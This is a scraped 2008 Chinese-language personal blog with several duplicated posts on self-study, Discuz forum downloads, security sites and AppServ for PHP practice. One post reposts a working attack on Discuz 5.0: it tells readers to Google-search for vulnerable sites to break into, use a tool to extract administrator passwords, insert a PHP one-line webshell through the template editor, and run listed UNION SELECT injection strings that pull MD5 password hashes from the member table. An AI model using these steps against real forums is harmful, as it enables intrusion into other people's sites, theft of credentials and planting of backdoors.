Google 是一個非常良好的搜尋器,各種資訊也可以使用它來搜尋出來,支援各種的搜尋語法,可以加快找到所需要的資料。以下附上一本電子書,出版自O'Reilly 的,稱為
下載Google- The missing manual
http://www.wikipedia.org/
2008年5月31日 星期六
自學電腦世界各種新知
經常覺得自己的知識不夠麼,那麼可以使用Google,Wikipedia ( 維基百科 ) 搜尋各種的資訊/資料,充實自己的知識。
Google 是一個非常良好的搜尋器,各種資訊也可以使用它來搜尋出來,支援各種的搜尋語法,可以加快找到所需要的資料。以下附上一本電子書,出版自O'Reilly 的,稱為 介紹Google 的使用方法。
下載Google- The missing manual
Wikipedia ( 維基百科 ) 是一個網上的百科全書,近乎所有你不明白的東西,也可以在這裏找到答案啊!而且更有各種的語言。
http://www.wikipedia.org/
Google 是一個非常良好的搜尋器,各種資訊也可以使用它來搜尋出來,支援各種的搜尋語法,可以加快找到所需要的資料。以下附上一本電子書,出版自O'Reilly 的,稱為
下載Google- The missing manual
http://www.wikipedia.org/
2008年5月28日 星期三
2008年5月26日 星期一
DISCUZ 論壇下載
Discuz! 是一個著名的國內PHP論壇程式,現時最新版本為6.0.0 RC1, 各位可以在以下的網站找到2.0.0 的版本,試試找出漏洞,並利用漏洞,增強各位的安全意識,以及鞏固PHP的認知。
http://download.comsenz.com/Discuz/
希望各位可以好好利用,在自己的電腦架伺服器,可以使用Appserv 。
http://download.comsenz.com/Discuz/
希望各位可以好好利用,在自己的電腦架伺服器,可以使用Appserv 。
2008年5月25日 星期日
Discuz 5.0 討論區漏洞
我最近瀏覽網站時,找到一個網誌說Discuz 5.0 的漏洞。
dz5最近出現了爆管理員密碼漏洞,問題出在pm.php,好友群發那裡.代碼如下:
3800hk
利用方法:
工具dz5.htm
1 在google裡輸入關鍵詞:Powered by Discuz! 5.0.0 搜索,找到入侵網站,也可以用網站獵手.
2 打開要入侵的網站,註冊一個用戶,登錄,在底部 清除 Cookies 處點右鍵,屬性,找到hash值,將其複製到利用工具裡hash裡,同時複製網址到工具url裡.
3查看右上角的會員 找到其版主的用戶名和id 把用戶名填到工具的msgto裡,修改 用ID值修改UID=1 中的1,點gogogo即可爆出密碼
3 找到成功利用可以爆出管理員密碼,登錄後台,然後在模版那裡,可以直接修改,選擇任一文件,插入lanke的php一句馬,用lanke 的客戶端連接,提交變量,成功會有環境變量的顯示,利用就成功了!
有時爆出的密碼只有15位,大家不會破解吧,那就按下面的方法就行啦!
15位有辦法解決的
你把SQL語句換一下啊
0) union select length(password),2,0 from cdb_members where uid=1/*
這句是得到MD5長度
0) union select left(password,15),2,0 from cdb_members where uid=1/*
這句得到MD5前15位
0) union select SUBSTRING(password,16,15),2,0 from cdb_members where uid=1/*
這句得到MD5 16-30位
0) union select right(password,2),2,0 from cdb_members where uid=1/*
這句得到MD5 31-32位
MD5一共是32位的
dz5最近出現了爆管理員密碼漏洞,問題出在pm.php,好友群發那裡.代碼如下:
3800hk
利用方法:
工具dz5.htm
1 在google裡輸入關鍵詞:Powered by Discuz! 5.0.0 搜索,找到入侵網站,也可以用網站獵手.
2 打開要入侵的網站,註冊一個用戶,登錄,在底部 清除 Cookies 處點右鍵,屬性,找到hash值,將其複製到利用工具裡hash裡,同時複製網址到工具url裡.
3查看右上角的會員 找到其版主的用戶名和id 把用戶名填到工具的msgto裡,修改 用ID值修改UID=1 中的1,點gogogo即可爆出密碼
3 找到成功利用可以爆出管理員密碼,登錄後台,然後在模版那裡,可以直接修改,選擇任一文件,插入lanke的php一句馬,用lanke 的客戶端連接,提交變量,成功會有環境變量的顯示,利用就成功了!
有時爆出的密碼只有15位,大家不會破解吧,那就按下面的方法就行啦!
15位有辦法解決的
你把SQL語句換一下啊
0) union select length(password),2,0 from cdb_members where uid=1/*
這句是得到MD5長度
0) union select left(password,15),2,0 from cdb_members where uid=1/*
這句得到MD5前15位
0) union select SUBSTRING(password,16,15),2,0 from cdb_members where uid=1/*
這句得到MD5 16-30位
0) union select right(password,2),2,0 from cdb_members where uid=1/*
這句得到MD5 31-32位
MD5一共是32位的
2008年5月23日 星期五
安全網站推介
想再網絡、系統安全下多番功夫? 又或是想找找電腦資料安全相關資料,可以試試這個網站:
http://www.packetstormsecurity.org/
PacketStormSecurity
裡面收藏有不少C 程式的原始碼,而且是高級至關於網絡編程,適合專家閱覽,當中著名的木馬程式,如Back Orifice, BO2K 等。
2008年5月20日 星期二
Appserv 2.6.0 最新版
若果各位還有記憶的話,我之前曾經介紹過這個軟件,這個軟件可以架設動態網站伺服器,與上次不同的是,這個版本是最新的版本,內含有的核心軟件都更新了,防止每天也被發現的漏洞。
這個軟件能架起支援PHP , MYSQL 的伺服器,在學習php 的朋友,不妨試試這個,安裝後可以用來實習實習啊。
當中PHP 程式,不少有安全漏洞,如SQL Injection Vulnerability , XSS (Cross Site Scripting) , code Injection ... ... 這些都可以在自行架設的伺服器中嘗試,但當然要自己寫一些含有漏洞的程式吧!
這個軟件能架起支援PHP , MYSQL 的伺服器,在學習php 的朋友,不妨試試這個,安裝後可以用來實習實習啊。當中PHP 程式,不少有安全漏洞,如SQL Injection Vulnerability , XSS (Cross Site Scripting) , code Injection ... ... 這些都可以在自行架設的伺服器中嘗試,但當然要自己寫一些含有漏洞的程式吧!
訂閱:
意見 (Atom)